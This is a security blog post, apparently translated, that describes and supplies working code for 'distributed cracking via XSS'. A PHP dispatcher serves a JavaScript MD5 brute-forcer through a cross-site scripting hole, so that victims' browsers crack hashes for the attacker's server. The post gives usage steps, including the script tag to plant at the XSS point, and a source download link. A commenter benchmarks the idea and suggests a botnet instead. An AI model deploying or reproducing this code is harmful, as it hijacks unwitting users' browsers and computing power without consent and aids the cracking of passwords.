Distributed Cracking via XSS

What can XSS do?

Steal information, worm attacks, phishing, DDoS...

So what is "distributed cracking via XSS"?

XSS runs on the user's PC, not on the server, so the number of hijacked clients can be very large: a single XSS on Baidu Tieba can flood your stolen-cookie inbox within minutes. So why not put those PCs to work for us?
Because of browser restrictions the services they can provide are limited, but they can still do computation.

For example, I put a JS script on my server. Every XSS victim who loads it is handed the hash (the "ciphertext") together with a distinct brute-force range (say 1-100000, 100001-200000, ...), and the victim's browser computes candidate hashes and compares them.
If some browser finds a match it reports the recovered plaintext; otherwise it loads the script again and continues with the next range. With enough victims the hash can be cracked in seconds!!!

That is the whole idea. Here is the test code for MD5 cracking (one PHP file that serves the dispatcher, the worker script and the result collector):

<?php
// Database connection. The mysql_* extension is PHP 5 only (removed in PHP 7).
$link = mysql_connect('localhost', 'root', 'passss');
if (!$link) {
        die('Could not connect: ' . mysql_error());
}
mysql_select_db('xss_crack', $link) or die ('Can\'t use xss_crack : ' . mysql_error());
?>

<?php if (isset($_GET['edit'])) : ?>
        <!-- ?edit : form for adding a hash to crack -->
        <form action="" method="POST">
                Hash:<input type="text" name="encode" value="" />
                Start:<input type="text" name="current" value="0" />
                Range size:<input type="text" name="region" value="10000">
                <input type="submit" value="Add" />
        </form>
<?php elseif(isset($_GET['look'])) : 
        $sql = "select encode,decode from crack order by addtime";        
        $res = @mysql_query($sql);

        echo '<pre>';
        if (mysql_num_rows($res) > 0) {
                while ($row = mysql_fetch_object($res)) {
                        echo htmlspecialchars($row -> encode)."  --  ";
                        echo htmlspecialchars($row -> decode);
                        echo "\r\n";
                }
                mysql_free_result($res);
        }
        echo '</pre>';
endif; ?>

<?php
// No query string: a victim browser is loading the worker script. Pick the
// oldest uncracked task and hand out its next range.
if (empty($_GET)) {
        $id = '';
        $encode = '';
        $current = '';
        $region = '';

        $sql = "select * from crack where cracked=0 order by addtime limit 1;";
        $res = @mysql_query($sql);

        if (mysql_num_rows($res) > 0) {
                while ($row = mysql_fetch_object($res)) {
                        $id = $row -> id;
                        $encode = $row -> encode;
                        $current = $row -> current;
                        $region = $row -> region;
                }
                mysql_free_result($res);
                // Advance the task's cursor by one range. select-then-update is
                // not atomic, so two browsers arriving at the same moment can be
                // given the same range; a range that a closed tab never finishes
                // is never handed out again.
                $sql = "update crack set current=current+region where id=$id";
                $res = @mysql_query($sql);
        }
}
?>
?>

<?php if (empty($_POST) && !empty($id)) :?>
        /*
         * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
         * Digest Algorithm, as defined in RFC 1321.
         * Copyright (C) Paul Johnston 1999 - 2000.
         * Updated by Greg Holt 2000 - 2001.
         * See http://pajhome.org.uk/site/legal.html for details.
         */
        var hex_chr = "0123456789abcdef";
        function rhex(num) {
                str = "";
                for ( j = 0; j <= 3; j++)
                        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F);
                return str;
        }

        function str2blks_MD5(str) {
                nblk = ((str.length + 8) >> 6) + 1;
                blks = new Array(nblk * 16);
                for ( i = 0; i < nblk * 16; i++)
                        blks[i] = 0;
                for ( i = 0; i < str.length; i++)
                        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
                blks[i >> 2] |= 0x80 << ((i % 4) * 8);
                blks[nblk * 16 - 2] = str.length * 8;
                return blks;
        }

        function add(x, y) {
                var lsw = (x & 0xFFFF) + (y & 0xFFFF);
                var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
                return (msw << 16) | (lsw & 0xFFFF);
        }

        function rol(num, cnt) {
                return (num << cnt) | (num >>> (32 - cnt));
        }

        function cmn(q, a, b, x, s, t) {
                return add(rol(add(add(a, q), add(x, t)), s), b);
        }

        function ff(a, b, c, d, x, s, t) {
                return cmn((b & c) | ((~b) & d), a, b, x, s, t);
        }

        function gg(a, b, c, d, x, s, t) {
                return cmn((b & d) | (c & (~d)), a, b, x, s, t);
        }

        function hh(a, b, c, d, x, s, t) {
                return cmn(b ^ c ^ d, a, b, x, s, t);
        }

        function ii(a, b, c, d, x, s, t) {
                return cmn(c ^ (b | (~d)), a, b, x, s, t);
        }

        function MD5(str) {
                x = str2blks_MD5(str);
                var a = 1732584193;
                var b = -271733879;
                var c = -1732584194;
                var d = 271733878;
                for ( i = 0; i < x.length; i += 16) {
                        var olda = a;
                        var oldb = b;
                        var oldc = c;
                        var oldd = d;
                        a = ff(a, b, c, d, x[i + 0], 7, -680876936);
                        d = ff(d, a, b, c, x[i + 1], 12, -389564586);
                        c = ff(c, d, a, b, x[i + 2], 17, 606105819);
                        b = ff(b, c, d, a, x[i + 3], 22, -1044525330);
                        a = ff(a, b, c, d, x[i + 4], 7, -176418897);
                        d = ff(d, a, b, c, x[i + 5], 12, 1200080426);
                        c = ff(c, d, a, b, x[i + 6], 17, -1473231341);
                        b = ff(b, c, d, a, x[i + 7], 22, -45705983);
                        a = ff(a, b, c, d, x[i + 8], 7, 1770035416);
                        d = ff(d, a, b, c, x[i + 9], 12, -1958414417);
                        c = ff(c, d, a, b, x[i + 10], 17, -42063);
                        b = ff(b, c, d, a, x[i + 11], 22, -1990404162);
                        a = ff(a, b, c, d, x[i + 12], 7, 1804603682);
                        d = ff(d, a, b, c, x[i + 13], 12, -40341101);
                        c = ff(c, d, a, b, x[i + 14], 17, -1502002290);
                        b = ff(b, c, d, a, x[i + 15], 22, 1236535329);
                        a = gg(a, b, c, d, x[i + 1], 5, -165796510);
                        d = gg(d, a, b, c, x[i + 6], 9, -1069501632);
                        c = gg(c, d, a, b, x[i + 11], 14, 643717713);
                        b = gg(b, c, d, a, x[i + 0], 20, -373897302);
                        a = gg(a, b, c, d, x[i + 5], 5, -701558691);
                        d = gg(d, a, b, c, x[i + 10], 9, 38016083);
                        c = gg(c, d, a, b, x[i + 15], 14, -660478335);
                        b = gg(b, c, d, a, x[i + 4], 20, -405537848);
                        a = gg(a, b, c, d, x[i + 9], 5, 568446438);
                        d = gg(d, a, b, c, x[i + 14], 9, -1019803690);
                        c = gg(c, d, a, b, x[i + 3], 14, -187363961);
                        b = gg(b, c, d, a, x[i + 8], 20, 1163531501);
                        a = gg(a, b, c, d, x[i + 13], 5, -1444681467);
                        d = gg(d, a, b, c, x[i + 2], 9, -51403784);
                        c = gg(c, d, a, b, x[i + 7], 14, 1735328473);
                        b = gg(b, c, d, a, x[i + 12], 20, -1926607734);
                        a = hh(a, b, c, d, x[i + 5], 4, -378558);
                        d = hh(d, a, b, c, x[i + 8], 11, -2022574463);
                        c = hh(c, d, a, b, x[i + 11], 16, 1839030562);
                        b = hh(b, c, d, a, x[i + 14], 23, -35309556);
                        a = hh(a, b, c, d, x[i + 1], 4, -1530992060);
                        d = hh(d, a, b, c, x[i + 4], 11, 1272893353);
                        c = hh(c, d, a, b, x[i + 7], 16, -155497632);
                        b = hh(b, c, d, a, x[i + 10], 23, -1094730640);
                        a = hh(a, b, c, d, x[i + 13], 4, 681279174);
                        d = hh(d, a, b, c, x[i + 0], 11, -358537222);
                        c = hh(c, d, a, b, x[i + 3], 16, -722521979);
                        b = hh(b, c, d, a, x[i + 6], 23, 76029189);
                        a = hh(a, b, c, d, x[i + 9], 4, -640364487);
                        d = hh(d, a, b, c, x[i + 12], 11, -421815835);
                        c = hh(c, d, a, b, x[i + 15], 16, 530742520);
                        b = hh(b, c, d, a, x[i + 2], 23, -995338651);
                        a = ii(a, b, c, d, x[i + 0], 6, -198630844);
                        d = ii(d, a, b, c, x[i + 7], 10, 1126891415);
                        c = ii(c, d, a, b, x[i + 14], 15, -1416354905);
                        b = ii(b, c, d, a, x[i + 5], 21, -57434055);
                        a = ii(a, b, c, d, x[i + 12], 6, 1700485571);
                        d = ii(d, a, b, c, x[i + 3], 10, -1894986606);
                        c = ii(c, d, a, b, x[i + 10], 15, -1051523);
                        b = ii(b, c, d, a, x[i + 1], 21, -2054922799);
                        a = ii(a, b, c, d, x[i + 8], 6, 1873313359);
                        d = ii(d, a, b, c, x[i + 15], 10, -30611744);
                        c = ii(c, d, a, b, x[i + 6], 15, -1560198380);
                        b = ii(b, c, d, a, x[i + 13], 21, 1309151649);
                        a = ii(a, b, c, d, x[i + 4], 6, -145523070);
                        d = ii(d, a, b, c, x[i + 11], 10, -1120210379);
                        c = ii(c, d, a, b, x[i + 2], 15, 718787259);
                        b = ii(b, c, d, a, x[i + 9], 21, -343485551);
                        a = add(a, olda);
                        b = add(b, oldb);
                        c = add(c, oldc);
                        d = add(d, oldd);
                }
                return rhex(a) + rhex(b) + rhex(c) + rhex(d);
        }

        function CreateHTTPObject() {
                var xmlhttp;

                try {
                        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
                } catch (e) {
                        try {
                                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
                        try {
                                xmlhttp = new XMLHttpRequest();
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                if (!xmlhttp && window.createRequest) {
                        try {
                                xmlhttp = window.createRequest();
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                return xmlhttp;
        }

        function post(url, data) {
                var xmlhttp = CreateHTTPObject();
                if (xmlhttp) {
                        xmlhttp.open("POST", url, true);
                        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                        xmlhttp.send(data);
                }
        }

        // Report the range this worker was working on (meant for a page-unload
        // handler; the original left the body empty and never wired it up).
        function badunload(url, id, current, region) {
                var data = 'id=' + id + '&cracked=0&current=' + current + '&region=' + region;
                post(url, data);
        }

        // Busy-wait: blocks the tab's main thread for n ms. Not used below.
        function sleep(n)
        {
                var start=new Date().getTime(); 
                while(true) {
                        if(new Date().getTime() - start > n)
                                break;
                }
        }

        var id = <?php echo $id; ?>;
        var encode = '<?php echo $encode; ?>';
        var current = <?php echo $current; ?>;
        var region = <?php echo $region; ?>;
        var url = '<?php echo 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; ?>';
        var data = '';

        var cracked = false;
        var decode = '';
        // Synchronous loop over [current, current+region): the victim's tab is
        // frozen until the range is exhausted.
        region += current;
        while(current < region) {
                if (MD5(String(current)) == encode) {
                        cracked = true;
                        decode = current;
                        break;
                }
                current++;
        }

        if (cracked) {
                data = 'id='+id+'&cracked=1'+'&decode='+encodeURIComponent(decode);
                post(url, data);
        } else {
                data = 'id='+id+'&cracked=0';
                post(url, data);
                // Not found: load this script again to be assigned the next range.
                var evil = document.createElement('script');
                evil.src = url;
                document.head.appendChild(evil);
        }
<?php endif; ?>

<?php
        if (isset($_POST['cracked'])) {
                // Result report from a worker. Anyone who finds this endpoint can
                // POST to it, so cast/escape before building SQL and let MySQL's
                // md5() re-check the reported plaintext instead of trusting it.
                if ($_POST['cracked'] == 1) {
                        $decode = mysql_real_escape_string($_POST['decode'], $link);
                        $id = (int)$_POST['id'];
                        $sql = "update crack set cracked=1,decode='$decode' where id=$id and encode=md5('$decode');";
                        @mysql_query($sql);
                }
        }
        else {
                // New task submitted from the ?edit form.
                if (isset($_POST['encode'])) {
                        $encode = mysql_real_escape_string($_POST['encode'], $link);
                        $current = (int)$_POST['current'];
                        $region = (int)$_POST['region'];
                        $addtime = date('Y-m-d H:i:s');
                        $sql = "insert into crack(encode,current,region,addtime) values('$encode', $current, $region, '$addtime')";
                        @mysql_query($sql);
                }
        }
?>

I opened three tabs in Chrome and cracked an eight-digit number in about 3 minutes. This article is only an idea; everyone is welcome to extend it (*^_^*)

Usage:

http://127.0.0.1/main.php?edit is the page for adding a hash to brute-force
http://127.0.0.1/main.php?look is the page for viewing cracked results
Include the script at the XSS point:

<script src='http://127.0.0.1/main.php'></script>

Since my programming skills are limited, it currently only brute-forces pure digits....
And if a user closes the page partway through, and the range assigned to them happens to be the one containing the password, then that's your bad luck and it won't be cracked...

Source attached: http://www.03sec.com/wp-content/uploads/2014/06/xss_crack.rar (for technical discussion only)

secmap: I implemented this idea before. After benchmarking it, the biggest bottleneck turned out to be that browser compute is very low, roughly 30% of a normal CPU, and it is not continuous, which raises the question of how much of that compute time is actually usable.
A rough calculation: with 10k PV and each visitor staying 15s, that's equivalent to 40 hours of CPU time; since a browser is no match for a real CPU, that's about a single core running MD5 for 12 hours?.. Even with task dispatch, some tasks get picked up and cracked but the "result" never gets submitted to the server, so it's less than 12 hours? A current GPU is probably easily 100x the compute of a CPU or more, right?

PS: with that much traffic, running a botnet would be more promising.
